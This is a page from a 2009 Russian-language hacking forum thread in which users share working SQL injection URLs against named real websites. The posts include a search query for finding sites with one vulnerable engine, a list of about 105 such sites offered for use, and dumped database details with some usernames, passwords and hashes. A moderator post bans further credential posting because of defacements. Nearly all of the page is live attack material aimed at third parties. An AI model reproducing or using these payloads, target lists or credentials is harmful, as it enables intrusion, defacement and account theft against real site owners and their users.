ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #9851  
Старый 12.06.2009, 12:12
Аватар для farex
farex
Banned
Регистрация: 11.03.2009
Сообщений: 214
Провел на форуме:
914766

Репутация: 317
По умолчанию

<<Производство пластиковых панелей>>
Код:
http://www.plastek-tlt.ru/remont.php?id=-144965+union+select+concat_ws(0x3a2a3a,version(),database(),user(),@@version_compile_os)--+
4.1.25-log:*:db00128047:*:00128047@localhost:*:unknown-freebsd4.10
 
Ответить с цитированием

  #9852  
Старый 12.06.2009, 12:43
Аватар для Dimionx
Dimionx
Познающий
Регистрация: 28.08.2008
Сообщений: 39
Провел на форуме:
243087

Репутация: 12
Отправить сообщение для Dimionx с помощью ICQ
По умолчанию

Нашёл бажный двиг
Поиск таких сайтов в гугле:
Код:
inurl:guest_book_sp/show_user.php?id=
Пример одного из таких сайтов:
www.kwota.ru
[PR: 2 ТиЦ: 230]
9 полей
mysql.user :
Код:
http://www.kwota.ru/guest_book_sp/show_user.php?id=-5381'+union+select+1,concat_ws(0x0b,user,password),3,4,5,6,7,8,9+from+mysql.user/*
Код:
root ;*FF80FA6E66C1D5FFEABE55E57F02EE3691459C26
Есть табличка users
Код:
http://www.kwota.ru/guest_book_sp/show_user.php?id=-5381'+union+select+1,group_concat(0x0b,id),3,4,5,6,7,8,9+from+users/*
Возможно прочесть только колонку id ((


Вот на гуглил базу с этим двигом везде есть sql inj))
(105 уязвимых сайтов)
Пользуйтесь (ни одного баяна):

Код:
www.21studio.ru
www.accelgraphics.com
www.all-languages.org
www.ankey.ru
www.antiarmy.net
www.aregard.com
www.aressel.com
www.arhport.ru
www.atilimtelecom.com
www.beatles-site.org
www.belmedia.ru
www.cate-blanchett.com
www.comincity.com
www.contrast-musique.com
www.crackedfinger.com
www.creasfera.com
www.deputatov.net
www.diapazon.net
www.doma4.com
www.dominique-sarraute.com
www.doublebassmaking.com
www.effport.com
www.egortitov.ru
www.elvanreklam.com
www.enorex.com
www.esezam.com
www.favorit.dn.ua
www.fizika2005.net
www.floridasawfish.com
www.flosoft-systems.com
www.fooweb.net
www.franckprovost.ru
www.go2thailand.org
www.grandsekerhotel.com
www.handitalia.net
www.harrys-stuff.com
www.hertz-security.ru
www.hightechsolutionsinc.com
www.ibcgulf.com
www.ikatel.net
www.ikatel.net
www.kamenskweb.net
www.kwota.ru
www.latitud34.net
www.leskavkaz.com
www.lgpu.lg.ua
www.makehit.com
www.media.spb.ru
www.mindsatlarge.com
www.mir-prazdnika.org
www.mncts.org
www.mncts.org
www.moscow2000.ru
www.moscow2006.com
www.myivan.com
www.namaste-bazaar.com
www.nasha-strana.ru
www.nb-info.org
www.necin.com.ua
www.neo-market.net
www.nmiqa.com
www.norbekov-minsk.com
www.nosovichi.net
www.nsltrading.com
www.nvrem.dux.ru
www.nw-seniorsonline.org
www.obrienthiele.com
www.ourlastingmemories.com
www.photofestival2007.net
www.phti.org
www.poodle-best.com
www.popkovich.com
www.postcardpolaroid.com
www.pressa.spb.ru
www.razbor.net
www.realtorlist.net
www.roadby.com
www.rwitalianfansclub.com
www.samirkuntar.net
www.sevmashvtuz.ru
www.shary.org
www.sigurdkohn.com
www.simlabs.org
www.sitemix.org
www.sporonositel.com
www.stephenmarkbarchan.com
www.studio317.com
www.tarriverfarms.com
www.tela.dux.ru
www.thistleworthbridgeclub.com
www.truskavec.com.ua
www.urlikov.net
www.voliga.ru
www.volver-lefilm.com
www.vpoprom.ru
www.wagnermartins.net
www.weloveproperties.com
www.werewolf-power.com
www.wittaker-stanley.com
www.worldwarfour.org
www.wubrg.net
www.ya-ru.net
www.yubikai.org
www.yukosgt.com
www.zenru.org

Последний раз редактировалось Dimionx; 12.06.2009 в 14:50..
 
Ответить с цитированием

  #9853  
Старый 12.06.2009, 14:43
Аватар для M.W.N.N.
M.W.N.N.
Участник форума
Регистрация: 05.01.2009
Сообщений: 191
Провел на форуме:
3020589

Репутация: 240
По умолчанию

-=WWF зеленые, защитники животных =-

Код:
http://www.wwfsa.org.za/print.php?id=506+union+select+1,2,3,4,5,6,concat_ws(0x3a,version(),database(),user()),8,9,10,11,12,13+limit+1,1/*
version():4.1.22
database():panda
user():panda@localhost

Код:
http://www.wwfsa.org.za/print.php?id=506+union+select+1,2,3,4,5,6,group_concat(username,0x3a,password),8,9,10,11,12,13+from+user+limit+1,1/*
corne:carolYn
xx:akales44
 
Ответить с цитированием

  #9854  
Старый 12.06.2009, 15:14
Аватар для TELO
TELO
Познающий
Регистрация: 21.01.2009
Сообщений: 98
Провел на форуме:
227123

Репутация: 122
Отправить сообщение для TELO с помощью ICQ
По умолчанию

Код:
http://avatar.su/avatar_static_ru_id_100x100_avatar.php?id=-1713%20union%20select%201,2,3,4,5,6,7,concat_ws(0x20,version(),user(%20),database()),9,10,11%20--
4.1.22-log dominator_avatar@10.1.41.13 dominator_avatar
 
Ответить с цитированием

  #9855  
Старый 12.06.2009, 16:20
Аватар для Dimionx
Dimionx
Познающий
Регистрация: 28.08.2008
Сообщений: 39
Провел на форуме:
243087

Репутация: 12
Отправить сообщение для Dimionx с помощью ICQ
По умолчанию

www.binainsan.co.id

Код:
http://www.binainsan.co.id/announcement/view_announcement.php?announcementid=192+union+select+1,concat_ws(0x0b,version(),user(),database()),3,4,5
Версия - 5.0.51a-24+lenny1-log
Юзер - as@localhost
БД - bina

Табличка юзеры

Код:
http://www.binainsan.co.id/announcement/view_announcement.php?announcementid=192+union+select+1,concat_ws(0x0b,password,name),3,4,5+from+tbluser
Код:
admin ; admin
 
Ответить с цитированием

  #9856  
Старый 12.06.2009, 16:35
Аватар для M.W.N.N.
M.W.N.N.
Участник форума
Регистрация: 05.01.2009
Сообщений: 191
Провел на форуме:
3020589

Репутация: 240
По умолчанию

Код:
http://www.outdoormarine.co.za/boat_details.php?id=27+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+limit+1,1/*
version():5.0.32-Debian_7etch10
database():db_outdoormarine
user()utdoorm_1@dedi43.jnb2.host-h.net

Код:
http://www.outdoormarine.co.za/boat_details.php?id=27+union+select+1,2,concat_ws(0x3a,user_id,username,user_password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+bb_users+limit+1,1/*
 
Ответить с цитированием

Внимание! Изменение правил темы
  #9857  
Старый 12.06.2009, 17:09
Аватар для Jokester
Jokester
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию Внимание! Изменение правил темы

В связи с участившимися дефейсами принято решение прекратить выкладывание в этой теме аккаунтов к админкам (включая хеши) Соответствующий пункт правил внесён в первый пост. С сегодняшнего дня , начиная с этого поста
все пароли и хеши будут удаляться, а нарушители наказываться.

Спасибо за внимание
 
Ответить с цитированием

  #9858  
Старый 12.06.2009, 17:54
Аватар для SkyLine32
SkyLine32
Участник форума
Регистрация: 01.03.2009
Сообщений: 121
Провел на форуме:
4022236

Репутация: 38
Отправить сообщение для SkyLine32 с помощью ICQ Отправить сообщение для SkyLine32 с помощью AIM Отправить сообщение для SkyLine32 с помощью MSN Отправить сообщение для SkyLine32 с помощью Yahoo
По умолчанию

PR 5
Цитата:
http://uzyjwyobrazni.pl/projekt.php?id=170+union+select+concat_ws(version( ),database(),user()),2,3--
Database Version: 4.1.22
Database name: uzyjwyobrazni
User name: uzyjwyobrazni@localhost
 
Ответить с цитированием

  #9859  
Старый 12.06.2009, 18:12
Аватар для DezMond™
DezMond™
Участник форума
Регистрация: 10.01.2008
Сообщений: 199
Провел на форуме:
961428

Репутация: 662
Отправить сообщение для DezMond™ с помощью ICQ
По умолчанию

http://www.freeflowers.ru/?m=-3+union+select+1,concat_ws(0x3a3a,id,nam,pas1,pas2 ,blk,pay,dat),3+from+cln+/*+&p=77&r=0&g=1


http://xbox-freedom.ru/consoles.php?id=-2'+union+select+1,user(),3,4,5,6,7,8,9,10+--+
z86420_v5@77.221.130.18

http://www.ces-expedition.ru/?module=17&part=single&item=-174+union+select+1,2,3,4,concat_Ws(0x3a3a,FK_ID,FC _LOGIN,FC_PWD,FC_NAME),6,7,8,9,10,11+from+core_use rs+/*+

Последний раз редактировалось jokester; 12.06.2009 в 19:44.. Причина: хеши и акки запрещены.
 
Ответить с цитированием

  #9860  
Старый 13.06.2009, 10:10
Аватар для HAXTA4OK
HAXTA4OK
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210

Репутация: 2017


По умолчанию

PR 6

http://informatics.iupui.edu/events/event.php?id=-873'+union+select+1,concat_ws(0x3a,user(),database (),version()),3,4,5,6,7,8,9/*

nm_info@in-info-web1:nm_info:5.0.27-max-log

http://informatics.iupui.edu/events/event.php?id=-873'+union+select+1,group_concat(table_name),3,4,5 ,6,7,8,9+from+information_schema.tables+group+by+t able_schema+limit+1,200/*

Цитата:
faculty,bitrates_flvvideos,pubs,new_semesters,lk_c ountries,events,people_names,new_courses,jobs,semi nars,current_students,page_index,lk_site,informati csdegrees,counties_us,researchareas,newsbytes_arch ive,lk_program,faculty_researchtopics,br_pubs_peop le,recorder,newmedia_projects,lk_course,eventtypes ,people_researchprograms

################################################## ###
PR 5

http://www.biology.uiowa.edu/faculty_info.php?ID=-91'+union+select+1,concat_ws(0x3a,database(),user( ),version()),3,4,5,6,7,8,9,10,11,12,13,14,15/*

website:websiteScript@localhost:5.0.45

tables:

Код:
computers,tracking_status,followups,templ_inst_software,dropdown_ram,prefs,dropdown_locations,networking,computers__ID,users,groups,templates,dropdown_type,software,dropdown_network,networking__ID,config,inst_software,tracking,event_log,software_bundles,dropdown_os,networking_ports,devices,comp_group,kbarticles,tracking__ID,fasttracktemplates,software_licenses,dropdown_processor,networking_wire,dropdown_iface,kbcategories,policy,section,subpolicy,handbook,directory,,pwusers,FileTypes,downloads,googleipaddresses,Meetings,News,Officers,Resources,Events,seqext2,labmembers,auth_user,seqext7,seqext3,organism,edits,sequence,seqext4,primers,gene,taxgroup,seqext5,seqext,has,seqext6
по моему все таблы нужные закрыты

Последний раз редактировалось HAXTA4OK; 13.06.2009 в 11:06..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ